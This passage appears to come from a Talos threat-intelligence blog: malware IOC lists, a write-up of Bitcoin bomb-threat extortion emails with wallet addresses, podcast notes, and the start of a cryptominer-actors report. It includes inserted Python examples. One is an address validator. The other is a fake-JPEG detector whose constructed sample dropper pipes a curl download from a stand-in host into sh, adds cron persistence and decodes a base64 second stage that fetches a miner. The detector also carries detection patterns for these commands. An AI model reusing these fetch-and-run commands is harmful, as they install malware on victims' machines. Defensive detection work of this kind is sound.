  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ospd.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pffcy.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rfioy.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxoqk.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tguha.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tvuin.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\uspe.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vkecy.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vtba.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vxqq.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vylwe.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\whtfo.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winadpngm.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winasew.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winauunwn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbkjyy.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbpcf.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbusg.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windlwd.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windpbi.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wineeyux.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winesrg.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfjvcgs.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfpmye.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winiuak.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjenpka.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjkyn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkqxb.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkrepqp.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winktee.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlbehwb.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlihxj.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlsbpg.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlxanm.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlywa.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winmtfju.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winneng.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnjxa.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnurxrn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winodpm.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winohuuif.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winolmyt.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winonwqwp.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpcpvjx.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdae.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdgmo.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpgqpu.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpmlm.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpnsv.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpuybd.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintqckmy.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winudusnh.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winuixn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcwb.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvxxb.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbnx.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbppmo.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winydntxg.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyksvqi.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyqksg.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xfkklk.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xgvmsf.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xmjmf.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xwota.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yxjkrt.exe
  • %SystemDrive%\eetdut.exe
File Hashes
  • 02e3ca0b78494efa9c54f41856fbf50478673329ea238c7786bdeb30542e5ed5
  • 034336a710468f49c1eed9d375a85d4d7f48ecc271dde830f60b428d52a94c2b
  • 0a9a606be52079bc06d34ee969313e58809c8bf4978e31101ce329b7651f564e
  • 2055ba5f6fa09c201359729adc6c0e20ad97346d698b5801b601d29a85e78c52
  • 34b3a1c08a185f7755b8fe3f741e13a6452b46766b2b564cd329c45bd45e1c76
  • 38764b867874a08bd44e8a4b78b670e7445f93af546fba0443c99f56d469a951
  • 3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c
  • 40d8f51d911e4f4d3fa29fcd39adc9e826557727dc1ec411404d6bd09c7f8c35
  • 518b8b1dea7caf5f1c2d9b6f6ef32ba70effc2f74ebd7a902434fc66e179700e
  • 609dcb6f088836745f24a24d71b49e092196b08a9924f42e8b63b92f4c0ebe24
  • 6f8fec09c16a0f5bb60e3ec4cd1a41cb34a2eaa59d0351f5f875a83dd7ec8411
  • 76cb38ecf5c3b925e946b6da3cc78e25e0df6db48c66073a6dc33bb8bc03cb5c
  • 78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178
  • 7d5787833d365d5a2d84c0e6135106bd6d5a49de4da86857995cf0222491c028
  • 8089f6db67efb482755dfc06ee4efe7271e685136e46a231b06bff87aca4393b
  • 9af10868ac775ec789e3b9e7475015c3ba66f9ed35aabcfe8ea323b9b1a8d7a5
  • 9fadad87f4763f5a062c0c12677b3b549f9df261484ad89cf58bb60809751e9c
  • a543f5d10445af1ce7710cc596b2b6ab0532cef51e9041b8f8c58bd36b218dd9
  • ac9ee5d47307f578e1a19a96dfb509a5063045a339ffcf1dc79f6a559f6385c3
  • c3a88516553f23807115597f99f0b8f9e8a62c68bf7ee321bf1ff6c599c3c8f1
  • c96d2cd51eff903958ccc279fa48e392e858403aead3add4b00e6e9b031d5754
  • d2da9a2988364a576679489265765e8bd5419ea66e8aea48e666a5300f2c5e6f
  • e080790b62f025fedc93b161dc061421ae47cf4785ecb1744d6da1be44f8667a
  • e1a951d34a0c35cc5a011242189ed82707d3fc40289b37470169703f269d88f4
  • e1d9701b9af405e448e57714ee762722c3ddc6306d271038c350b0cfc138cebc

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware

Doc.Malware.Powload-6775735-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\552FFA80-3393-423d-8671-7BA046BB5906
  • Local\ZonesCacheCounterMutex
  • Local\ZonesLockedCacheCounterMutex
  • RasPbFile
  • Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
  • Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500
  • Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500
  • Local\10MU_ACB10_S-1-5-5-0-57527
  • Local\10MU_ACBPIDS_S-1-5-5-0-57527
  • Local\WinSpl64To32Mutex_e162_0_3000
  • \BaseNamedObjects\Global\.net clr networking
IP Addresses contacted by malware. Does not indicate maliciousness
  • 199[.]188[.]200[.]110
  • 185[.]72[.]59[.]32
  • 185[.]87[.]51[.]118
  • 185[.]2[.]4[.]116
  • 177[.]185[.]194[.]161
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]w3[.]org
  • tecleweb[.]com[.]br
  • chiporestaurante[.]com
  • www[.]onecubeideas[.]com
  • onecubeideas[.]com
  • dc[.]amegt[.]com
  • fortools[.]ru
Files and/or directories created
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{257D7FC1-A1F1-4741-80E5-4CCDA3324B78}.tmp
  • %AppData%\Microsoft\Templates\~$Normal.dotm
  • %AppData%\Microsoft\Word\STARTUP
  • %AppData%\Microsoft\Office\Recent\index.dat
  • \EVENTLOG
  • \ROUTER
  • %UserProfile%\Documents\20181207
  • %LocalAppData%\Temp\705.exe
  • %LocalAppData%\Temp\CVR8C5B.tmp
  • %AppData%\Microsoft\Office\Recent\355848530.doc.LNK
  • %SystemDrive%\~$5848530.doc
  • %LocalAppData%\Temp\fjzx2n2i.cc2.ps1
  • %LocalAppData%\Temp\qfrje44a.wpp.psm1
  • %LocalAppData%\Temp\~DF25D3033E1B874DBC.TMP
  • %AppData%\Microsoft\Office\Recent\37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c.LNK
File Hashes
  • 02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf
  • 0aac7ab733c51437873bf791b28557b12e027bf9bf1b3eafcde05388010af655
  • 0cc53d287e5df9017989526addc988b49fcd76894032458720acad7c265df9de
  • 14ab7c3501e5ea1482687558d1544698b85cd9b24b3580245a85ce0b781c03e7
  • 1af67c800700954695d42c3e124753750016b7c598c6fa2f9bcd9f85723dd1c6
  • 1bfc31debc05dc83864b01ddf300552ec6496cc0d1c25b5846fcd2a4c5da93df
  • 1e0c90f629beae558c6af53c3def9cda4bc77d06cd42131b8f969ff0da9afe25
  • 1ff1729697c956aa4270731f63686d2f6aa1e86a47d219f32058fa67be31817f
  • 21982965fc5661c509d1833f8fe9caf02d7649619b7b542d7a735abd7936a9cd
  • 21e781747a69ebeda636616b47fdd4ff871b9c672aad10f3cf95cbd55eb8b169
  • 239fea895e2a4a3bd3c3339ce48b2f330bd611d8120e0937aca1c8581e977849
  • 2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3
  • 2b3064f31f52b8d33a9a7f73c1624252f4a2b615df0c99b4c70b4c617eed87fa
  • 2c97f2997575df803d28dd38636856fd0efb9fa7efaea22c526b8dc71daa9aee
  • 370c83daaa8ad3c9e1f684ac93a5c7436e86bab917f8511544792f083fd8d127
  • 37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c
  • 3ac2d948a193f03d6d6bbd288ab9ae2b58588567e459aecae80a66e00a291847
  • 3b958df2dedb42704c2baf7b9dff89112db8e8297a594ebe98303f9913004e9b
  • 54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be
  • 56de2fad613807e46613e7159681a962cc8c54fc6ed20c7c3e90e104cdbfeaff
  • 590cb8e2648bc9566d2709a22d33369309e32ddfcf6cf725dfce6b0efb2b51b3
  • 5a2763ea3481568a73456a2e784b6b31b32845ec08df99b3394533ecdb0f973a
  • 5f47e689fb44578d43e4c7590ce10c275f7f533c894387086bf5e0bb3a68e46d
  • 626ead7063f00752432c54dcb61975b060e306f2712fa2fb1e6f3aa4cc406e1a
  • 6714f37afcbe1d0685770f9558c40d0856e7c337f8d4c4beb7e312672adda950

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware

PUA.Win.Trojan.Hupigon-6776762-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Local\MSCTF.Asm.MutexDefault1
  • \BaseNamedObjects\ISPWizard Mutex
  • ISPWizard Mutex
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and/or directories created
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpsetup.exe
  • %System32%\rnaph.dll
  • %LocalAppData%\Temp\tmpsetup.exe
File Hashes
  • 0d72d9ee3de3e8ac191444390ba097b471e72fe6ff951b8d77f2107486f1310d
  • 174751136660fe996a57657e8ec2205ad9a5e9efe8eaa5078b714f5fb51cf9a2
  • 1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9
  • 4d2719868251d27b80b746161fcb2eb78e5ce1927b10c4da5f782ccc51b619e5
  • 835a2e9ef6349c641ac1e786aae48338c88e76315a2ce4fd4c43903304984093
  • a1a60ca213175febdcc3ff1bc578053c563a6d33c40312f46f3118464e2c9b34
  • c6f5fcd39af9fe1a342d5b55b09c74c5cc29c666becdc583098e0a09883491c5
  • d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411
  • e1d008fcb364fa01413eb0710ec049f74e791b17ae25d8f27fe857a7ff9aa8f9
  • f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4

Coverage

Screenshots of Detection: AMP, ThreatGrid, Malware

Bitcoin Bomb Scare Associated with Sextortion Scammers

This blog was written by Jaeson Schultz.

Organizations across the country are on edge today after a flurry of phony bomb threats hit several public entities on Thursday, including universities, schools and news outlets. The attackers distributed malicious emails claiming to have placed some type of explosive material in the recipient's building. The emails stated the attackers would detonate these explosives unless the victim made a Bitcoin payment of several thousand dollars.

Cisco Talos discovered that this campaign is actually an evolution of sextortion and extortion attacks that we reported on in October. The claims in the emails we've seen from this actor are completely false, yet they have caused untold amounts of damage as organizations have evacuated buildings and called upon law enforcement to investigate.


An example of the malicious, phony emails that attackers sent out to organizations across the U.S. yesterday.


What makes these particular extortion messages unique from other extortion scams we've monitored is that, previously, the attackers threatened only the individual — the attackers would threaten to expose sensitive data, or even attack the recipient physically, but there was never any threat of harm to a larger group of people, and certainly not the threat of a bomb.

Talos has discovered 17 distinct Bitcoin addresses that were used in the bomb extortion attack. Only two of the addresses have a positive balance, both from transactions received Dec. 13, the day the attacks were distributed. However, the amounts of each transaction were under $1, so it is evident the victims in this case declined to pay the $20,000 extortion payment price demanded by the attackers.

So far, all of the samples Talos has found to be associated with the bomb threat attack were sent from IP addresses belonging to the domain registrar and hosting company reg.ru, suggesting that the attackers in this case may have compromised credentials for domains hosted at this particular registrar. Multiple IPs involved in sending these bomb threats also sent the various types of sextortion email we saw in the previous campaign. In those cases, the attackers sent out emails claiming to have compromising videos of the victim and threatening to release them to the public unless the attacker received a Bitcoin payment.

As of late yesterday, the bomb threat email attack morphed. The attackers have returned to their empty threats of harming the individual recipient. This time, they threaten to throw acid on the victim.


An example of the newer extortion emails, claiming they will dump acid on the victim unless they receive a Bitcoin payment.


So far, none of the Bitcoin addresses associated with these new emails have received any payments. The source of the sending IP addresses changed, however. This time, the attackers are making heavy use of IP addresses at the Russian hosting company TimeWeb. As with the bomb threats, these IP addresses belong to domains that the attackers likely compromised.

The criminals conducting these extortion email attacks have demonstrated that they are willing to concoct any threat and story imaginable that they believe will fool the recipient. At this point, we have seen several different variations of these emails, and we expect these sorts of attacks to continue as long as there are victims who believe the threats are credible and are scared enough to send money to the attackers. Talos encourages users not to fall for these schemes and, above all, never to pay the extortion demand. Paying only confirms to the attackers that their social engineering approach is working, and the victims' money goes directly toward facilitating additional attacks.

IOCs (BTC Addresses)

11B68RbmyxQys2CXXbAZxcwVXnaWCNBbw
12MET3CnEBkRc5Si5udf95fGaTZ6JwgpkK
132f8T1qF9hZj13MvPN5FbxrAhGExYZ7P3
149oyt2DL52Jgykhg5vh7Jm1QpdpfuyVqd
15F7TCqGRWE66xrBNxyt9ko1XsKaQvEh9t
15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM
1893DMwnrq9vA6JmQBdyWRKecArDAUTcGR
18UNWkvEDXgYzSAVnTmaR1X66w3T7HHsdn
1BTuxsCpAGtCzcszvFV2g4beqAZ2AUnyFh
1BfmmRBfhujpK944gai4vWvwCwGeHKbmkB
1BHasGex1jhRZeY7KyUGGKUNRtVgKedRY8
1CDs3JXUU6wNmndAF7EFcrJ6GGSYRKXd7w
1CF9VQhwjJutPxwVq5QLFA7j7baq4RDb3w
1CXrmcKL7W2o6FnrFx3ZBGn2EAsbMVZMzD
1CdD3nthrWR76RkL1WwLH7BSqCFASLjbhu
1D3ArQebDneVBVCqLort9jwvUA3AoZaNq5
1DVVQpxF4nG7rmuQFb7ZboGxu6ahKJcjf5
1Dnw2qJxGFCZdE3PzCaVioBB9zERc7SzRB
1DRXeydtqfjAmvfrLY7XiCo2A1vCq32z3a
1Ebf2rrLxVuMGKkwi2PeZtjBEEiidxrkkL
1FnTQHffH42iS15FMYNZxmNdbXtmb8WChF
1GTd6DPqcxCwX263BMsvk7FcjCQxsXhJUs
1GYAJY3GRsC5twdPgmQiEeNjdn7Kx6KSPd
1L5SWCu4ZTLiyPyTAvfSVjhKrYNSnYgBKk
1LEevM4MxKSGRrTvVrvLyjiuq3vYssdTRa
1LT4WgSuTD71Emzc7DLeHxVoZ1RjkhNcFY
1LTYBLzVSLe6GDFJ5NVVxLR2j5eQ8Wy51N
1LjxZonruwcKXEUYySrXt7gWGJLL6Pzuyx
1M9r1FpWj5QbSMECeJvXoa85TDMpoQcRaT
1MeDDtvZB5TE5tDTcwk6GiGSK3sTAP2KLA
1P3cNFy3SdfZ8PvMSdgLRcb2TtaLvxfqat
1PqX7bMnCzpJ7L1mxuGgNyaJSkJRM8SjES
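Before pivoting on an address list like the one above (checking balances, clustering transactions, adding it to a blocklist), it is worth confirming that each string is actually a well-formed Bitcoin address: legacy addresses carry a four-byte checksum, so a character dropped or mangled in transcription is detectable. This is an added example, not code from the Talos post or any Talos tool. PAGE_SAMPLES copies two addresses from the list above; the function names, the deliberately broken inputs and the triage verdicts are constructed for the demo.

```python
"""Base58Check-validate a list of Bitcoin address IOCs.

Added example, not code from the Talos post. A legacy (P2PKH/P2SH) address
is Base58Check: version byte || 20-byte hash160 || 4-byte checksum, where the
checksum is the first four bytes of SHA256(SHA256(version || hash160)).
PAGE_SAMPLES are copied from the IOC list above; everything else is constructed.
"""
import hashlib

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
VERSION_NAMES = {0x00: "P2PKH", 0x05: "P2SH"}  # mainnet prefixes 1... and 3...

# Copied from the IOC list above (every address in that campaign starts with '1').
PAGE_SAMPLES = [
    "11B68RbmyxQys2CXXbAZxcwVXnaWCNBbw",
    "1PqX7bMnCzpJ7L1mxuGgNyaJSkJRM8SjES",
]


def b58decode(s: str) -> bytes:
    """Decode Base58 to bytes. Each leading '1' encodes one leading zero byte,
    which is why every P2PKH address starts with '1' (version byte 0x00)."""
    num = 0
    for ch in s:
        idx = ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"non-base58 character {ch!r}")
        num = num * 58 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    leading_zeros = len(s) - len(s.lstrip("1"))
    return b"\x00" * leading_zeros + body


def check_address(addr: str) -> dict:
    """Validate one legacy address and report its type. The three failure
    modes (bad alphabet, wrong length, checksum mismatch) are reported
    separately because each points at a different kind of transcription damage."""
    try:
        raw = b58decode(addr)
    except ValueError as exc:
        return {"valid": False, "type": None, "reason": str(exc)}
    if len(raw) != 25:
        return {"valid": False, "type": None,
                "reason": f"decoded to {len(raw)} bytes, expected 25"}
    payload, checksum = raw[:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    if checksum != expected:
        return {"valid": False, "type": None, "reason": "checksum mismatch"}
    version = payload[0]
    kind = VERSION_NAMES.get(version, f"unknown version 0x{version:02x}")
    return {"valid": True, "type": kind, "reason": "ok"}


def triage(addresses) -> dict:
    """Split an IOC list into addresses safe to pivot on and ones to send back
    for re-checking, with the reason each was rejected."""
    result = {"usable": [], "rejected": {}}
    for addr in addresses:
        verdict = check_address(addr)
        if verdict["valid"]:
            result["usable"].append(addr)
        else:
            result["rejected"][addr] = verdict["reason"]
    return result


if __name__ == "__main__":
    outcome = triage(PAGE_SAMPLES)
    for addr, reason in outcome["rejected"].items():
        print(f"REJECT {addr}: {reason}")
    print(f"{len(outcome['usable'])} of {len(PAGE_SAMPLES)} addresses pass Base58Check")
```

The checksum only protects against accidental damage; a valid-looking address that is simply not the attacker's one will pass, so this is a sanity check on the list, not evidence about the campaign. Bech32 (bc1...) addresses use a different encoding and would be rejected by the length check here, which is correct for this list since every address in it is a legacy 1... address.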


Coverage



Beers with Talos EP 43: Espionage, Encryption, and CISO Square One



Beers with Talos (BWT) Podcast Ep. #43 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #43 show notes: 

Recorded Dec. 7, 2018.

Several of us are under the weather, but the show must go on. We did our best, as always. After running through some recent research, we spend a good bit of this EP looking through the lens of a recent breach at the first things a new security leader should get a handle on - what questions need to be answered? What information and practices are day-1 vital? We wrap up taking a look at a slew of vulns Talos uncovered in secure messaging apps.

The timeline:

The topics

01:00 - Roundtable - we talk about the Reds, death by IoT lawnmowers, and the special Spam we get
12:40 - DNSpionage campaign and DNS redirection attacks
20:50 - Day One as CISO - Handling Inherited Risk as a Leader
50:45 - (in)Secure messenger apps - Ranging responses to vuln disclosures
1:02:36 - Closing thoughts and parting shots

The links

(in)Secure messaging blog post

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Connecting the dots between recently active cryptominers

Post authored by David Liebenberg and Andrew Williams.

Executive Summary

Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined.

This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies.

We will cover the recent activities of these actors:
  • Rocke — A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.
  • 8220 Mining Group — Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.
  • Tor2Mine — A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).
These groups have used similar TTPs, including:
  • Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.
  • The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.
  • Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.
  • Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.
  • Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.
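The first and fourth TTPs above (scripts disguised as "logo*.jpg" that install cron jobs and fetch miners, and Base64-wrapped scripts hosted on Pastebin) can be checked for on disk with a small file inspector. The following Python is an added example, not code from Talos or from the actors' repositories: it verifies the JPEG magic bytes, looks for shell-script markers in the raw bytes, and decodes any long Base64 run so a second stage hidden behind `base64 -d` is scanned too. The indicator labels, the scoring and the two sample files are this example's own constructions.

```python
import base64
import re

# Indicators this checker looks for. The "logo*.jpg" naming, cron persistence,
# curl/wget staging and base64-wrapped payloads come from the post; the labels
# and the pass/fail logic are this example's own assumptions.
JPEG_MAGIC = b"\xff\xd8\xff"
SHELL_MARKERS = [
    ("shebang",     re.compile(rb"^#!\s*/bin/(ba)?sh", re.M)),
    ("downloader",  re.compile(rb"\b(curl|wget)\b[^\n]*https?://")),
    ("cron",        re.compile(rb"\bcrontab\b|/etc/cron\.d/|/var/spool/cron/")),
    ("base64-exec", re.compile(rb"\bbase64\s+(-d|--decode)\b")),
    ("miner",       re.compile(rb"\bxmrig\b|stratum\+tcp://|minerpool", re.I)),
]
# A long run of base64-alphabet characters is treated as a wrapped payload.
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def decode_embedded_base64(data):
    """Return the decoded bytes of every long base64 run found in data."""
    decoded = []
    for blob in B64_BLOB.findall(data):
        try:
            decoded.append(base64.b64decode(blob, validate=True))
        except ValueError:  # not valid base64 after all (e.g. bad padding)
            continue
    return decoded


def inspect_fake_jpeg(name, data):
    """Classify a file that claims to be a JPEG.

    Shell-script markers are searched for in the raw bytes and in every
    base64 layer inside them, so a dropper that hides its real stage behind
    `base64 -d | sh` is still caught. A genuine JPEG starts with FF D8 FF
    and produces no hits.
    """
    hits = set()
    for layer in [data] + decode_embedded_base64(data):
        for label, pattern in SHELL_MARKERS:
            if pattern.search(layer):
                hits.add(label)
    is_jpeg = data.startswith(JPEG_MAGIC)
    masquerading = name.lower().endswith((".jpg", ".jpeg")) and not is_jpeg
    return {
        "name": name,
        "is_jpeg": is_jpeg,
        "hits": sorted(hits),
        "suspicious": masquerading and bool(hits),
    }


# Constructed samples (not real malware): a minimal JPEG header, and a script
# shaped like the "logo*.jpg" droppers the post describes, whose second stage
# is base64-wrapped the way the Pastebin-hosted scripts were. All hosts use
# the reserved .invalid TLD.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64
_STAGE2 = (b"#!/bin/sh\n"
           b"curl -fsSL http://example.invalid/xm64 -o /tmp/xm64\n"
           b"/tmp/xm64 -o stratum+tcp://pool.example.invalid:3333\n")
FAKE_LOGO = (b"#!/bin/bash\n"
             b"(crontab -l; echo '*/10 * * * * curl -fsSL "
             b"http://example.invalid/logo4.jpg | sh') | crontab -\n"
             b"echo " + base64.b64encode(_STAGE2) + b" | base64 -d | sh\n")

if __name__ == "__main__":
    for fname, blob in (("photo.jpg", REAL_JPEG), ("logo4.jpg", FAKE_LOGO)):
        print(inspect_fake_jpeg(fname, blob))
```

Run over a web root or /tmp, the `suspicious` flag only fires when the extension and the magic bytes disagree and script markers are present, which keeps ordinary images, and ordinary shell scripts with honest names, out of the alert list.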
We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published separate research today covering this trend.

Timeline of actors' campaigns

Timeline of Activity

Introduction

Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware.

Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attacks' wallets and command and control (C2) servers, we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining.

We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs.

We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications.

